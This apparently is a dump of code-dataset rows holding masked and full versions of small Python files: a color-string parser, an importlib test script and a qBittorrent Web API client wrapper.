t = tuple(map(float, m.groups()))
if not any(n > 1 for n in t):
return tuple(int(round(n * 255)) for n in t)
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_float format.'
)
def parse_rgbfunc_percent(rgbfunc):
"""Example: rgb(67%, 20%, 87.5%)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 100 for n in t):
return tuple(int(round(n * 255 / 100)) for n in t)
raise ValueError(
f'String {rgbfunc!r} does not match rgbfunc_percent format.')
def parse_name_css(name):
name = name.lower()
if name not in _css_names:
raise ValueError(f'Color {name!r} is not named in the CSS dataset.')
return parse_hex6(_css_names[name])
def parse_name_crayola(name):
name = name.lower()
if name not in _crayola_names:
raise ValueError(f'Color {name!r} is not named in the crayola dataset.'
)
return parse_hex6(_crayola_names[name])
def parse_name_xkcd(name):
name = name.lower()
if name not in _xkcd_names:
raise ValueError(f'Color {name!r} is not named in the xkcd dataset.')
return parse_hex6(_xkcd_names[name])
def parse_name_meodai_best(name):
name = name.lower()
if name not in _meodai_best_names:
raise ValueError(
f'Color {name!r} is not named in the meodai-best dataset.')
return parse_hex6(_meodai_best_names[name])
def parse_name_meodai(name):
name = name.lower()
if name not in _meodai_names:
raise ValueError(f'Color {name!r} is not named in the meodai dataset.')
return parse_hex6(_meodai_names[name])
def parse(colstr, *, hex6=True, hex3=True, rgbfunc_int=True, rgbfunc_float=
True, rgbfunc_percent=True, name_css=True, name_crayola=True, name_xkcd
=True, name_meodai_best=True, name_meodai=True):
"""Combine all other parse functions into one "universal" function. Use kwargs to disable certain parsers."""
funcs = []
if hex6:
funcs.append(parse_hex6)
if hex3:
funcs.append(parse_hex3)
if rgbfunc_int:
funcs.append(parse_rgbfunc_int)
if rgbfunc_float:
funcs.append(parse_rgbfunc_float)
if rgbfunc_percent:
funcs.append(parse_rgbfunc_percent)
if name_css:
funcs.append(parse_name_css)
if name_crayola:
funcs.append(parse_name_crayola)
if name_xkcd:
funcs.append(parse_name_xkcd)
if name_meodai_best:
funcs.append(parse_name_meodai_best)
if name_meodai:
funcs.append(parse_name_meodai)
res = None
for func in funcs:
try:
res = func(colstr)
except ValueError:
pass
if res is None:
raise ValueError(f'Could not find a working parser for {colstr!r}.')
return res
| <mask token>
import json
import re
from pathlib import Path
import importlib.resources as resources
from pilutils.basic import hex_to_rgb
__all__ = ['parse_hex6', 'parse_hex3', 'parse_rgbfunc_int',
'parse_rgbfunc_float', 'parse_rgbfunc_percent', 'parse_name_css',
'parse_name_crayola', 'parse_name_xkcd', 'parse_name_meodai_best',
'parse_name_meodai', 'parse']
_css_names = json.loads(resources.read_text('pilutils.colornames', 'css.json'))
_crayola_names = json.loads(resources.read_text('pilutils.colornames',
'crayola.json'))
_xkcd_names = json.loads(resources.read_text('pilutils.colornames',
'xkcd.json'))
_meodai_best_names = json.loads(resources.read_text('pilutils.colornames',
'meodai-best.json'))
_meodai_names = json.loads(resources.read_text('pilutils.colornames',
'meodai.json'))
def parse_hex6(hex6):
"""Example: #ab34df"""
if (m := re.match('^#?([0-9A-Fa-f]{6})$', hex6.strip())):
h = int(m.group(1), 16)
return hex_to_rgb(h)
raise ValueError(f'String {hex6!r} does not match hex6 format.')
def parse_hex3(hex3):
"""Example: #a3d"""
if (m := re.match('^#?([0-9A-Fa-f]{3})$', hex3.strip())):
h3 = m.group(1)
return tuple(int(c * 2, 16) for c in h3)
raise ValueError(f'String {hex3!r} does not match hex3 format.')
def parse_rgbfunc_int(rgbfunc):
"""Example: rgb(171, 52, 223)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3})\\s*,\\s*(\\d{1,3})\\s*,\\s*(\\d{1,3})\\s*\\)$',
rgbfunc.strip())):
t = tuple(map(int, m.groups()))
if not any(n > 255 for n in t):
return t
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_int format.')
def parse_rgbfunc_float(rgbfunc):
"""Example: rgb(0.67, 0.2, 0.87)"""
if (m := re.match(
'^rgb\\(\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 1 for n in t):
return tuple(int(round(n * 255)) for n in t)
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_float format.'
)
def parse_rgbfunc_percent(rgbfunc):
"""Example: rgb(67%, 20%, 87.5%)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 100 for n in t):
return tuple(int(round(n * 255 / 100)) for n in t)
raise ValueError(
f'String {rgbfunc!r} does not match rgbfunc_percent format.')
def parse_name_css(name):
name = name.lower()
if name not in _css_names:
raise ValueError(f'Color {name!r} is not named in the CSS dataset.')
return parse_hex6(_css_names[name])
def parse_name_crayola(name):
name = name.lower()
if name not in _crayola_names:
raise ValueError(f'Color {name!r} is not named in the crayola dataset.'
)
return parse_hex6(_crayola_names[name])
def parse_name_xkcd(name):
name = name.lower()
if name not in _xkcd_names:
raise ValueError(f'Color {name!r} is not named in the xkcd dataset.')
return parse_hex6(_xkcd_names[name])
def parse_name_meodai_best(name):
name = name.lower()
if name not in _meodai_best_names:
raise ValueError(
f'Color {name!r} is not named in the meodai-best dataset.')
return parse_hex6(_meodai_best_names[name])
def parse_name_meodai(name):
name = name.lower()
if name not in _meodai_names:
raise ValueError(f'Color {name!r} is not named in the meodai dataset.')
return parse_hex6(_meodai_names[name])
def parse(colstr, *, hex6=True, hex3=True, rgbfunc_int=True, rgbfunc_float=
True, rgbfunc_percent=True, name_css=True, name_crayola=True, name_xkcd
=True, name_meodai_best=True, name_meodai=True):
"""Combine all other parse functions into one "universal" function. Use kwargs to disable certain parsers."""
funcs = []
if hex6:
funcs.append(parse_hex6)
if hex3:
funcs.append(parse_hex3)
if rgbfunc_int:
funcs.append(parse_rgbfunc_int)
if rgbfunc_float:
funcs.append(parse_rgbfunc_float)
if rgbfunc_percent:
funcs.append(parse_rgbfunc_percent)
if name_css:
funcs.append(parse_name_css)
if name_crayola:
funcs.append(parse_name_crayola)
if name_xkcd:
funcs.append(parse_name_xkcd)
if name_meodai_best:
funcs.append(parse_name_meodai_best)
if name_meodai:
funcs.append(parse_name_meodai)
res = None
for func in funcs:
try:
res = func(colstr)
except ValueError:
pass
if res is None:
raise ValueError(f'Could not find a working parser for {colstr!r}.')
return res
| """Functions for parsing various strings to RGB tuples."""
import json
import re
from pathlib import Path
import importlib.resources as resources
from pilutils.basic import hex_to_rgb
__all__ = [
"parse_hex6",
"parse_hex3",
"parse_rgbfunc_int",
"parse_rgbfunc_float",
"parse_rgbfunc_percent",
"parse_name_css",
"parse_name_crayola",
"parse_name_xkcd",
"parse_name_meodai_best",
"parse_name_meodai",
"parse",
]
_css_names = json.loads(resources.read_text("pilutils.colornames", "css.json"))
_crayola_names = json.loads(resources.read_text("pilutils.colornames", "crayola.json"))
_xkcd_names = json.loads(resources.read_text("pilutils.colornames", "xkcd.json"))
_meodai_best_names = json.loads(
resources.read_text("pilutils.colornames", "meodai-best.json")
)
_meodai_names = json.loads(resources.read_text("pilutils.colornames", "meodai.json"))
def parse_hex6(hex6):
"""Example: #ab34df"""
if m := re.match(r"^#?([0-9A-Fa-f]{6})$", hex6.strip()):
h = int(m.group(1), 16)
return hex_to_rgb(h)
raise ValueError(f"String {hex6!r} does not match hex6 format.")
def parse_hex3(hex3):
"""Example: #a3d"""
if m := re.match(r"^#?([0-9A-Fa-f]{3})$", hex3.strip()):
h3 = m.group(1)
return tuple(int(c * 2, 16) for c in h3)
raise ValueError(f"String {hex3!r} does not match hex3 format.")
def parse_rgbfunc_int(rgbfunc):
"""Example: rgb(171, 52, 223)"""
if m := re.match(
r"^rgb\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*\)$", rgbfunc.strip()
):
t = tuple(map(int, m.groups()))
if not any(n > 255 for n in t):
return t
raise ValueError(f"String {rgbfunc!r} does not match rgbfunc_int format.")
def parse_rgbfunc_float(rgbfunc):
"""Example: rgb(0.67, 0.2, 0.87)"""
if m := re.match(
r"^rgb\(\s*([01]\.\d+)\s*,\s*([01]\.\d+)\s*,\s*([01]\.\d+)\s*\)$",
rgbfunc.strip(),
):
t = tuple(map(float, m.groups()))
if not any(n > 1 for n in t):
return tuple(int(round(n * 255)) for n in t)
raise ValueError(f"String {rgbfunc!r} does not match rgbfunc_float format.")
def parse_rgbfunc_percent(rgbfunc):
"""Example: rgb(67%, 20%, 87.5%)"""
if m := re.match(
r"^rgb\(\s*(\d{1,3}(?:\.\d+)?)%\s*,\s*(\d{1,3}(?:\.\d+)?)%\s*,\s*(\d{1,3}(?:\.\d+)?)%\s*\)$",
rgbfunc.strip(),
):
t = tuple(map(float, m.groups()))
if not any(n > 100 for n in t):
return tuple(int(round(n * 255 / 100)) for n in t)
raise ValueError(f"String {rgbfunc!r} does not match rgbfunc_percent format.")
def parse_name_css(name):
name = name.lower()
if name not in _css_names:
raise ValueError(f"Color {name!r} is not named in the CSS dataset.")
return parse_hex6(_css_names[name])
def parse_name_crayola(name):
name = name.lower()
if name not in _crayola_names:
raise ValueError(f"Color {name!r} is not named in the crayola dataset.")
return parse_hex6(_crayola_names[name])
def parse_name_xkcd(name):
name = name.lower()
if name not in _xkcd_names:
raise ValueError(f"Color {name!r} is not named in the xkcd dataset.")
return parse_hex6(_xkcd_names[name])
def parse_name_meodai_best(name):
name = name.lower()
if name not in _meodai_best_names:
raise ValueError(f"Color {name!r} is not named in the meodai-best dataset.")
return parse_hex6(_meodai_best_names[name])
def parse_name_meodai(name):
name = name.lower()
if name not in _meodai_names:
raise ValueError(f"Color {name!r} is not named in the meodai dataset.")
return parse_hex6(_meodai_names[name])
def parse(
colstr,
*,
hex6=True,
hex3=True,
rgbfunc_int=True,
rgbfunc_float=True,
rgbfunc_percent=True,
name_css=True,
name_crayola=True,
name_xkcd=True,
name_meodai_best=True,
name_meodai=True,
):
"""Combine all other parse functions into one "universal" function. Use kwargs to disable certain parsers."""
funcs = []
if hex6:
funcs.append(parse_hex6)
if hex3:
funcs.append(parse_hex3)
if rgbfunc_int:
funcs.append(parse_rgbfunc_int)
if rgbfunc_float:
funcs.append(parse_rgbfunc_float)
if rgbfunc_percent:
funcs.append(parse_rgbfunc_percent)
if name_css:
funcs.append(parse_name_css)
if name_crayola:
funcs.append(parse_name_crayola)
if name_xkcd:
funcs.append(parse_name_xkcd)
if name_meodai_best:
funcs.append(parse_name_meodai_best)
if name_meodai:
funcs.append(parse_name_meodai)
res = None
for func in funcs:
try:
res = func(colstr)
except ValueError:
pass
if res is None:
raise ValueError(f"Could not find a working parser for {colstr!r}.")
return res
| [
7,
10,
12,
13,
14
] |
698 | 8a773448383a26610f4798e12fb514248e71dc4b | <mask token>
| <mask token>
if __name__ == '__main__':
module = importlib.import_module('UserFile')
print(module.if_new_message)
print(module.ID)
| import importlib
if __name__ == '__main__':
module = importlib.import_module('UserFile')
print(module.if_new_message)
print(module.ID)
| null | null | [
0,
1,
2
] |
699 | 8ce2db0a28de8ddd504b744f3c9210d1a0ed7d45 | <mask token>
class QBittorrentClient:
<mask token>
<mask token>
def login(self, username: str, password: str):
return self.connector.login(username, password)
def logout(self):
return self.connector.logout()
def get_application_version(self):
"""
Grab the application version of QBittorent.
Returns
-------
str
"""
return self.connector.request('GET', '/app/version')
def get_api_version(self):
"""
Grab the api version.
Returns
-------
str
"""
return self.connector.request('GET', '/app/webapiVersion')
<mask token>
<mask token>
<mask token>
def add_torrents(self, *links: str, **kwargs):
"""
Adds torrents
"""
defaults = {'torrents': None, 'savepath': None, 'cookie': None,
'category': None, 'skip_checking': None, 'root_folder': None,
'rename': None, 'upLimit': None, 'dlLimit': None, 'autoTMM':
None, 'sequentialDownload': None, 'firstLastPiecePrio': None}
payload = {k: kwargs.get(k, v) for k, v in defaults.items() if v or
kwargs.get(k)}
if len(links):
payload['urls'] = '\n'.join(links)
return self.connector.request('POST', '/torrents/add', payload=payload)
def pause_torrents(self, *hashes: str):
"""
Pauses torrents.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/pause', payload=
payload)
def resume_torrent(self, hashes: list):
"""
Resumes a single torrent.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/resume', payload=
payload)
| <mask token>
class QBittorrentClient:
<mask token>
def __init__(self, *, connector):
self.connector = connector
def login(self, username: str, password: str):
return self.connector.login(username, password)
def logout(self):
return self.connector.logout()
def get_application_version(self):
"""
Grab the application version of QBittorent.
Returns
-------
str
"""
return self.connector.request('GET', '/app/version')
def get_api_version(self):
"""
Grab the api version.
Returns
-------
str
"""
return self.connector.request('GET', '/app/webapiVersion')
def get_log(self, **kwargs):
"""
Grabs the log.
Parameters
----------
normal: bool, optional
Include normal messages
info: bool, optional
Include info messages
warning: bool, optional
Include warning messages
critical: bool, optional
Include critical messages
last_known_id: int, optional
Exclude messages with "message id" <= last_known_id
Returns
-------
dict
"""
payload = {'normal': kwargs.get('normal', True), 'info': kwargs.get
('info', True), 'warning': kwargs.get('warning', True),
'critical': kwargs.get('critical', True), 'last_known_id':
kwargs.get('last_known_id', -1)}
return self.connector.request('GET', '/log/main', payload=payload)
<mask token>
def get_torrent_info(self, torrent_hash: str):
payload = {'hash': torrent_hash}
return self.connector.request('POST', '/torrents/properties',
payload=payload)
def add_torrents(self, *links: str, **kwargs):
"""
Adds torrents
"""
defaults = {'torrents': None, 'savepath': None, 'cookie': None,
'category': None, 'skip_checking': None, 'root_folder': None,
'rename': None, 'upLimit': None, 'dlLimit': None, 'autoTMM':
None, 'sequentialDownload': None, 'firstLastPiecePrio': None}
payload = {k: kwargs.get(k, v) for k, v in defaults.items() if v or
kwargs.get(k)}
if len(links):
payload['urls'] = '\n'.join(links)
return self.connector.request('POST', '/torrents/add', payload=payload)
def pause_torrents(self, *hashes: str):
"""
Pauses torrents.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/pause', payload=
payload)
def resume_torrent(self, hashes: list):
"""
Resumes a single torrent.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/resume', payload=
payload)
| <mask token>
class QBittorrentClient:
"""
QBittorent client
"""
def __init__(self, *, connector):
self.connector = connector
def login(self, username: str, password: str):
return self.connector.login(username, password)
def logout(self):
return self.connector.logout()
def get_application_version(self):
"""
Grab the application version of QBittorent.
Returns
-------
str
"""
return self.connector.request('GET', '/app/version')
def get_api_version(self):
"""
Grab the api version.
Returns
-------
str
"""
return self.connector.request('GET', '/app/webapiVersion')
def get_log(self, **kwargs):
"""
Grabs the log.
Parameters
----------
normal: bool, optional
Include normal messages
info: bool, optional
Include info messages
warning: bool, optional
Include warning messages
critical: bool, optional
Include critical messages
last_known_id: int, optional
Exclude messages with "message id" <= last_known_id
Returns
-------
dict
"""
payload = {'normal': kwargs.get('normal', True), 'info': kwargs.get
('info', True), 'warning': kwargs.get('warning', True),
'critical': kwargs.get('critical', True), 'last_known_id':
kwargs.get('last_known_id', -1)}
return self.connector.request('GET', '/log/main', payload=payload)
def get_torrents(self, **kwargs):
"""
Gets the list of torrents.
Parameters
----------
filter: str, optional
Filter torrent list.
Allowed filters: all, downloading, completed, paused, active, inactive, resumed
category: str, optional
Get torrents with the given category
Empty string means "without category"
No "category" parameter means "any category"
sort: str, optional
Sort torrents by given key.
reverse: bool, optional
Enable reverse sorting.
limit: int, optional
Limit the number of torrents returned
offset: int, optional
Set offset (if less than 0, offset from end)
hashes: list or str, optional
Filter by hashes.
Returns
-------
dict
Property Type Description
hash string Torrent hash
name string Torrent name
size integer Total size (bytes) of files selected for download
progress float Torrent progress (percentage/100)
dlspeed integer Torrent download speed (bytes/s)
upspeed integer Torrent upload speed (bytes/s)
priority integer Torrent priority. Returns -1 if queuing is disabled or torrent is in seed mode
num_seeds integer Number of seeds connected to
num_complete integer Number of seeds in the swarm
num_leechs integer Number of leechers connected to
num_incomplete integer Number of leechers in the swarm
ratio float Torrent share ratio. Max ratio value: 9999.
eta integer Torrent ETA (seconds)
state string Torrent state. See table here below for the possible values
seq_dl bool True if sequential download is enabled
f_l_piece_prio bool True if first last piece are prioritized
category string Category of the torrent
super_seeding bool True if super seeding is enabled
force_start bool True if force start is enabled for this torrent
Possible values of state:
Value Description
error Some error occurred, applies to paused torrents
missingFiles Torrent data files is missing
uploading Torrent is being seeded and data is being transferred
pausedUP Torrent is paused and has finished downloading
queuedUP Queuing is enabled and torrent is queued for upload
stalledUP Torrent is being seeded, but no connection were made
checkingUP Torrent has finished downloading and is being checked
forcedUP Torrent is forced to uploading and ignore queue limit
allocating Torrent is allocating disk space for download
downloading Torrent is being downloaded and data is being transferred
metaDL Torrent has just started downloading and is fetching metadata
pausedDL Torrent is paused and has NOT finished downloading
queuedDL Queuing is enabled and torrent is queued for download
stalledDL Torrent is being downloaded, but no connection were made
checkingDL Same as checkingUP, but torrent has NOT finished downloading
forceDL Torrent is forced to downloading to ignore queue limit
checkingResumeData Checking resume data on qBt startup
moving Torrent is moving to another location
unknown Unknown status
"""
defaults = {'filter': None, 'category': None, 'sort': None,
'reverse': None, 'limit': None, 'offset': None}
payload = {k: kwargs.get(k, v) for k, v in defaults.items() if v or
kwargs.get(k)}
hashes = kwargs.get('hashes')
if hashes:
payload['hashes'] = '|'.join(hashes) if isinstance(hashes, list
) else hashes
return self.connector.request('POST', '/torrents/info', payload=payload
)
def get_torrent_info(self, torrent_hash: str):
payload = {'hash': torrent_hash}
return self.connector.request('POST', '/torrents/properties',
payload=payload)
def add_torrents(self, *links: str, **kwargs):
"""
Adds torrents
"""
defaults = {'torrents': None, 'savepath': None, 'cookie': None,
'category': None, 'skip_checking': None, 'root_folder': None,
'rename': None, 'upLimit': None, 'dlLimit': None, 'autoTMM':
None, 'sequentialDownload': None, 'firstLastPiecePrio': None}
payload = {k: kwargs.get(k, v) for k, v in defaults.items() if v or
kwargs.get(k)}
if len(links):
payload['urls'] = '\n'.join(links)
return self.connector.request('POST', '/torrents/add', payload=payload)
def pause_torrents(self, *hashes: str):
"""
Pauses torrents.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/pause', payload=
payload)
def resume_torrent(self, hashes: list):
"""
Resumes a single torrent.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/resume', payload=
payload)
| import json
from .errors import TorrentNotValid, TorrentHashNotFound, FailedLogin, HttpException
class QBittorrentClient:
"""
QBittorent client
"""
def __init__(self, *, connector):
self.connector = connector
def login(self, username: str, password: str):
return self.connector.login(username, password)
def logout(self):
return self.connector.logout()
def get_application_version(self):
"""
Grab the application version of QBittorent.
Returns
-------
str
"""
return self.connector.request('GET', '/app/version')
def get_api_version(self):
"""
Grab the api version.
Returns
-------
str
"""
return self.connector.request('GET', '/app/webapiVersion')
def get_log(self, **kwargs):
"""
Grabs the log.
Parameters
----------
normal: bool, optional
Include normal messages
info: bool, optional
Include info messages
warning: bool, optional
Include warning messages
critical: bool, optional
Include critical messages
last_known_id: int, optional
Exclude messages with "message id" <= last_known_id
Returns
-------
dict
"""
payload = {'normal': kwargs.get('normal', True), 'info': kwargs.get
('info', True), 'warning': kwargs.get('warning', True),
'critical': kwargs.get('critical', True), 'last_known_id':
kwargs.get('last_known_id', -1)}
return self.connector.request('GET', '/log/main', payload=payload)
def get_torrents(self, **kwargs):
"""
Gets the list of torrents.
Parameters
----------
filter: str, optional
Filter torrent list.
Allowed filters: all, downloading, completed, paused, active, inactive, resumed
category: str, optional
Get torrents with the given category
Empty string means "without category"
No "category" parameter means "any category"
sort: str, optional
Sort torrents by given key.
reverse: bool, optional
Enable reverse sorting.
limit: int, optional
Limit the number of torrents returned
offset: int, optional
Set offset (if less than 0, offset from end)
hashes: list or str, optional
Filter by hashes.
Returns
-------
dict
Property Type Description
hash string Torrent hash
name string Torrent name
size integer Total size (bytes) of files selected for download
progress float Torrent progress (percentage/100)
dlspeed integer Torrent download speed (bytes/s)
upspeed integer Torrent upload speed (bytes/s)
priority integer Torrent priority. Returns -1 if queuing is disabled or torrent is in seed mode
num_seeds integer Number of seeds connected to
num_complete integer Number of seeds in the swarm
num_leechs integer Number of leechers connected to
num_incomplete integer Number of leechers in the swarm
ratio float Torrent share ratio. Max ratio value: 9999.
eta integer Torrent ETA (seconds)
state string Torrent state. See table here below for the possible values
seq_dl bool True if sequential download is enabled
f_l_piece_prio bool True if first last piece are prioritized
category string Category of the torrent
super_seeding bool True if super seeding is enabled
force_start bool True if force start is enabled for this torrent
Possible values of state:
Value Description
error Some error occurred, applies to paused torrents
missingFiles Torrent data files is missing
uploading Torrent is being seeded and data is being transferred
pausedUP Torrent is paused and has finished downloading
queuedUP Queuing is enabled and torrent is queued for upload
stalledUP Torrent is being seeded, but no connection were made
checkingUP Torrent has finished downloading and is being checked
forcedUP Torrent is forced to uploading and ignore queue limit
allocating Torrent is allocating disk space for download
downloading Torrent is being downloaded and data is being transferred
metaDL Torrent has just started downloading and is fetching metadata
pausedDL Torrent is paused and has NOT finished downloading
queuedDL Queuing is enabled and torrent is queued for download
stalledDL Torrent is being downloaded, but no connection were made
checkingDL Same as checkingUP, but torrent has NOT finished downloading
forceDL Torrent is forced to downloading to ignore queue limit
checkingResumeData Checking resume data on qBt startup
moving Torrent is moving to another location
unknown Unknown status
"""
defaults = {'filter': None, 'category': None, 'sort': None,
'reverse': None, 'limit': None, 'offset': None}
payload = {k: kwargs.get(k, v) for k, v in defaults.items() if v or
kwargs.get(k)}
hashes = kwargs.get('hashes')
if hashes:
payload['hashes'] = '|'.join(hashes) if isinstance(hashes, list
) else hashes
return self.connector.request('POST', '/torrents/info', payload=payload
)
def get_torrent_info(self, torrent_hash: str):
payload = {'hash': torrent_hash}
return self.connector.request('POST', '/torrents/properties',
payload=payload)
def add_torrents(self, *links: str, **kwargs):
"""
Adds torrents
"""
defaults = {'torrents': None, 'savepath': None, 'cookie': None,
'category': None, 'skip_checking': None, 'root_folder': None,
'rename': None, 'upLimit': None, 'dlLimit': None, 'autoTMM':
None, 'sequentialDownload': None, 'firstLastPiecePrio': None}
payload = {k: kwargs.get(k, v) for k, v in defaults.items() if v or
kwargs.get(k)}
if len(links):
payload['urls'] = '\n'.join(links)
return self.connector.request('POST', '/torrents/add', payload=payload)
def pause_torrents(self, *hashes: str):
"""
Pauses torrents.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/pause', payload=
payload)
def resume_torrent(self, hashes: list):
"""
Resumes a single torrent.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/resume', payload=
payload)
| null | [
8,
11,
13,
14
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.